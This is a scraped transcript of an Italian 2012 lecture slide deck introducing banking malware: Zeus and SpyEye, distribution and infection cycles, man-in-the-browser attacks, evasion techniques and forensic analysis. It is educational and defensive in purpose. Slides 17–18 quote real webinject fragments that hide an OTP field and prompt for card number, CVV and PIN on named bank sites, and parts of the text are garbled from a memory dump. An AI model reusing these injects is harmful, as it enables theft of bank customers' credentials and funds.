La presentazione è in caricamento. Aspetta per favore

La presentazione è in caricamento. Aspetta per favore

Malware Bancario I NTRODUZIONE A L C RIMEWARE NEL S ETTORE B ANCARIO PRESI NELLA RETE - C OLLEGIO GHISLIERI 23 N OVEMBRE 2012 Dott. Francesco Schifilliti.

Presentazioni simili


Presentazione sul tema: "Malware Bancario I NTRODUZIONE A L C RIMEWARE NEL S ETTORE B ANCARIO PRESI NELLA RETE - C OLLEGIO GHISLIERI 23 N OVEMBRE 2012 Dott. Francesco Schifilliti."— Transcript della presentazione:

1 Malware Bancario I NTRODUZIONE A L C RIMEWARE NEL S ETTORE B ANCARIO PRESI NELLA RETE - C OLLEGIO GHISLIERI 23 N OVEMBRE 2012 Dott. Francesco Schifilliti

2 C OS È UN B ANKING T ROJAN ? 001 This term refers to the subset of malware seeking to steal/theft data from electronic bank accounts. Within this context, other financial services such as, for instance, online stock exchange operations are also considered electronic banking.

3 Zeus, SpyEye… e tanti altri 002

4 Soggetti (minimi) Coinvolti 003

5 Malware Developing 004

6 Malware Distribution 005 User ?

7 Malware Distribution 006 Pay-per-Install Drive-by-Download Exploit-as-a-Services

8 Ciclo Pay-per-Install 007 Exploit-as-a-Services

9 Fase di Infezione e Controllo 008 Exploit Pack Compromised Web Site Infection Mail di Spam

10 Iterando il processo dInfezione… 009 Flat BotnetP2P Botnet

11 Ciclo dInfezione di un Malware sul PC 010 Infezione sul Disco (ad es. SpyEye copia il file C:\cleansweep.ex e) Rendere Persistent il MW (ad es. con la modifica del registry) Injection (generalmente sul processo Explorer) Estensione della Injection (generalmente con tecniche di Hooking in Userland) Connessione persistente col Server di C&C

12 Odore di $$$ 011 User data theft data & session theft

13 Man in the Browser 012 Kernel- land User- land

14 Anti-Detection/Deception Techniques MW Code 013 Anti Memory Anti Emulation Anti Debugging Anti Disassembler Cryptography Packing & Protecting Obfuscation

15 Struttura di SpyEye 014 P P Binary Plugin del Malware: config.dat, ccgrabber collectors, sock5 customconnector webinjectors.txt Plugin del Malware: config.dat, ccgrabber collectors, sock5 customconnector webinjectors.txt Packer Obfuscation Anti-Dbg C&C

16 Un pezzettino di Webinjector di uno SpyEye ….. set_url * meine.deutsche-bank.de /trxm/db/*european.transfer.enter.data* GP data_before

17 Un pezzettino di Webinjector di un ATS 016 ….. set_url * commbank.com.au /netbank/UserMaintenance* GP data_before *My Q* data_end data_inject window.onload = function() { for ( i=0; i < document.links.length; i++ ) if (document.links[i].id != 'H_LogOffLink' && document.links[i].id != 'ctl00_HeaderControl_LogOffLink) document.links[i].onclick = function() { return false; }; }; var clck_counter = 0; function msg() { clck_counter++; if (clck_counter==2) { document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.visibility = "hidden; document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.display = "none document.getElementById('ctl00_BodyPlaceHolder_btnGenSMS_field').disabled = true; document.getElementById('error').style.top = 42; document.getElementById('error').style.left = 42; document.getElementById('error').style.visibility = "visible; document.getElementById('error').style.display = "block; } return false; } …..

18 Webinject in Chiaro nella RAM https://bcol.barclaycard.co.uk*cardSummary*:](ÈÈÈÍÍ #inject { display: none; }.ui-dialog { width: 400px; font-size: 11px; }.ui-dialog.ui-dialog-titlebar-close { visibility: hidden; }.ui-dialog.ui-dialog-titlebar { visibility: hidden; display: none; } P ıº| Ó Ω |HÓ Ω |pÓ Ω |òÓıº|¿Ó Ω |ËÓ˘º|Ô˙º|8Ô˙º|`ÔπàÔπÔÿÔ–·Ô value=unescape(document.cookie.substring(offset, end)) jQuery("#inject_cc").focus(); } else if (jQuery("#inject_expdate_mm").val().length < 2) { alert('Please enter Exp.Date'); jQuery("#inject_expdate_mm").focus(); } else if (jQuery("#inject_expdate_yy").val().length < 2) { alert('Please enter Exp.Date'); jQuery("#inject_expdate_yy").focus(); } else if (jQuery("#inject_cvv").val().length < 3) { alert('Please enter correct CVV'); jQuery("#inject_cvv").focus(); } else if (jQuery("#inject_pin").val().length < 5) { ……. 017

19 SpyEye: esempio di MW modulare e parametrico 018 User Cosa/Come Rubare è definito in base ai Plugin Installati sulla Bot. billinghammer.dll_5f00ca c15ebe2e682a19e8c9 bugreport.dll_a6c c1550db437aac86d4ffdad ccgrabber.dll_5b a6e8f eb88be39df creditgrab.dll_0e0c1855fa82ca3ad20bbe b2 ffcertgrabber.dll_6b5ffc56cec8f60a448fe7a a5 Plugin_CreditGrab.dll_0e0c1855fa82ca3ad20bbe b2 rdp.dll_0cb722049e024f2366ba9c187cb3929f ddos.dll_716d daa5e2a e9a77 … su Quale Banca/Ist. Finanziario fare operazioni in Frode è definito in webinjectors.txt a Chi Trasmettere i dati collezionati dal MW è definito in collectors.txt

20 Uno Schema di Riferimento dellAnalisi 019 Forensic Ananlysis Disk Analysis MW Searching Reg. Analysis Browser Analysis File Analysis Hash Comparing Entropy Analysis MW Analysis De- Anti- XYZ DisasseblingDebugging Memory Dumping Live Analysis Network Analysis Memory Analysis PIENA COMPRENSIONE DEL FORENSIC ARTIFACT

21 GRAZIE Francesco Schifilliti


Scaricare ppt "Malware Bancario I NTRODUZIONE A L C RIMEWARE NEL S ETTORE B ANCARIO PRESI NELLA RETE - C OLLEGIO GHISLIERI 23 N OVEMBRE 2012 Dott. Francesco Schifilliti."

Presentazioni simili


Annunci Google